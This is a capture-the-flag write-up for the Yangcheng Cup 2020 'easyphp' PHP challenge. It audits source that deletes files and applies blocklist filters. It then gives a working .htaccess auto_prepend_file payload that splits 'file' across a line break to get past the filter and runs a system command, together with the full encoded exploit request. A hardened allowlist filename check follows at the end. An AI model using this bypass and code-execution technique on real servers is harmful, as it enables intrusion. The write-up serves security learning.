[Yangcheng Cup 2020] easyphp
2022-07-02 23:02:00 【-Gardenia blue-】
<?php
$files = scandir('./');
foreach($files as $file) {
    if(is_file($file)){
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
    highlight_file(__FILE__);
    die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
    echo "Hacker";
    die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
    echo "Hacker";
    die();
}
$files = scandir('./');
foreach($files as $file) {
    if(is_file($file)){
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
file_put_contents($filename, $content . "\nHello, world");
?>
Code audit
$files = scandir('./');
foreach($files as $file) {
    if(is_file($file)){
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
Every regular file in the current directory other than index.php is deleted on each request.
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
    highlight_file(__FILE__);
    die();
}
If either the content or the filename parameter is missing, the source is shown and the script dies.
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
    echo "Hacker";
    die();
}
The content parameter is filtered with a case-insensitive substring blocklist: it may not contain on, html, type, flag, upload or file.
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
    echo "Hacker";
    die();
}
The filename parameter is filtered as well: it may consist only of lowercase letters and dots, otherwise the script dies.
$files = scandir('./');
foreach($files as $file) {
    if(is_file($file)){
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
Same as the cleanup at the top: everything except index.php is deleted again.
file_put_contents($filename, $content . "\nHello, world");
Our content is written into the file named by filename.
Note that "\nHello, world" is appended to whatever we write; that trailing line will make the resulting file error out when it is parsed, unless we account for it.
The first idea was filename=a.php with a one-line webshell as content. In practice:
the content was output straight to the page as HTML and was not parsed. Presumably only index.php is configured to be parsed by PHP on the backend; after all, the code goes out of its way to preserve index.php. So the question became whether we could change the configuration ourselves through a .htaccess file, and from a senior player's writeup it turned out that .htaccess is indeed the intended way to get the flag.
php_value auto_prepend_fil\
e .htaccess
#<?php system('cat /fla?');?>\
In .htaccess a trailing \ continues the directive onto the next line, so the first two lines are read as php_value auto_prepend_file .htaccess.
The word file is split across the line break precisely to get past the stristr filter on file.
The third line uses a # comment to hold the one-line PHP payload: in .htaccess, # marks a comment, but once the file is prepended by PHP the <?php ... ?> block inside it is executed.
The \ at the end of the third line joins the appended Hello, world onto the comment line, so it stays part of the comment; otherwise hello world would land on a fourth line and cause an error.
?filename=.htaccess&content=php_value%20auto_prepend_fil%5C%0Ae%20.htaccess%0A%23%3C%3Fphp%20system('cat%20/fla?')%3B%3F%3E%5C
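As an added example that is not part of the original challenge or this writeup, here is how the filename check could be rewritten as an allowlist so that dotfiles such as .htaccess and unexpected extensions are refused before anything reaches the disk; the uploads directory and the .txt-only policy are assumptions for illustration.

```php
<?php
// Added example (not the challenge's own code): a hardened replacement for the
// filename/content checks in easyphp. The original relies on a substring blocklist
// ('on', 'html', 'file', ...) and a regex that still allows dotfiles such as .htaccess.
// This version uses an allowlist instead: a fixed upload directory, a plain
// [a-z]+ basename, a single permitted extension, and no leading dot.

const UPLOAD_DIR  = __DIR__ . '/uploads';   // assumed directory, not in the original
const ALLOWED_EXT = ['txt'];                 // assumed policy: plain text only

function validateFilename(string $filename): ?string
{
    // Exactly one dot with lowercase letters on both sides: this rejects ".htaccess",
    // "a.b.php", path separators and any name that starts with a dot.
    if (preg_match('/^([a-z]{1,32})\.([a-z]{1,8})$/', $filename, $m) !== 1) {
        return null;
    }
    if (!in_array($m[2], ALLOWED_EXT, true)) {
        return null;
    }
    return $filename;
}

function safeWrite(string $filename, string $content): bool
{
    $name = validateFilename($filename);
    if ($name === null) {
        return false;
    }
    // A resolved directory plus a validated basename keeps the write inside UPLOAD_DIR.
    $dir = realpath(UPLOAD_DIR);
    if ($dir === false) {
        return false;
    }
    // The body is written verbatim. The web server must serve UPLOAD_DIR without PHP
    // execution and with AllowOverride None, so no substring filtering of the body
    // is needed and a stray .htaccess could not change the configuration anyway.
    return file_put_contents($dir . '/' . $name, $content, LOCK_EX) !== false;
}

// Usage: the challenge payload's filename is rejected, an ordinary text name passes.
var_dump(validateFilename('.htaccess'));
var_dump(validateFilename('notes.txt'));
```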